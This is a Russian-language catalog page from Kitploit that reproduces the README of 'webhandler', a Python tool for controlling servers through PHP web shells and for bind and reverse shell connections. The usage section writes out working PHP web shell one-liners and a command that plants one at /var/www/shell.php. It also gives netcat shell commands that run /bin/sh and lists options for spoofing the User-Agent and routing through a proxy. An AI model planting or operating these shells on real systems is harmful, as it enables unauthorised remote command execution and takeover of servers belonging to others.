Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
webhandler — Симулятор Bash для управления сервером с помощью системных функций PHP. | Kitploit
Инструменты/GitHubGitHub/lnxg33k/webhandler
Генерация полезной нагрузкиОбход IDS/IPSЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHublnxg33k/webhandler

webhandler

Симулятор Bash для управления сервером с помощью системных функций PHP.

Репозиторий
100245 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

WebHandler


Обработчик для системных функций PHP, а также альтернативный обработчик для netcat Моё изображение

Информация


WebHandler пытается имитировать приглашение 'Linux bash' для обработки и выполнения:

root@kitploit:~
- Функций выполнения программ PHP _(например, `system`, `passthru`, `exec` и т.д.)_
- Подключений прямой оболочки (bind shell)
- Подключений обратной оболочки (reserve shell)

Ещё одна возможность — подмена поля "User-Agent" в HTTP-заголовке. (--random-angent).

Также поддерживаются HTTP-прокси (--proxy http://<ip>:<port>)

  • WebHandler работает с POST и GET запросами:

    • <?php system($_GET['cmd']); ?>
    • <?php passthru($_REQUEST['cmd']); ?>
    • <?php echo exec($_POST['cmd']); ?>
  • WebHandler является заменой для подключений netcat.

    Пример прямого подключения (например, nc -lvvp 1234 -e /bin/sh)

    Обычно пользователь делает:

    • netcat -l -p 1234
    • nc -lvvp 1234

    Пример обратного подключения (например, nc 127.0.0.1 4321 -e /bin/sh)

    Обычно пользователь делает:

    • netcat -l -p 4321
    • nc -lvvp 4321

Использование


  • --Пример файла:

    • echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php
  • Параметр --url обязателен при отправке GET или POST запросов (например, для прямого 'веб-ориентированного PHP' подключения):

    • python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    • python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
  • Параметр --listen обязателен при ожидании подключения (например, для обратного 'сырого' подключения):

    • python webhandler.py --listen 1234

Зависимости


Если версия вашего Python меньше 2.7.x, то argparse обязателен Для установки выполните: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse ИЛИ sudo pip --install argparse.

readline необязателен. Этот модуль используется для расширенного редактирования строк и поддержки истории

git необязателен. Это позволяет поддерживать проект в актуальном состоянии

Ссылки


Wiki

Known Bugs

Скачать инструмент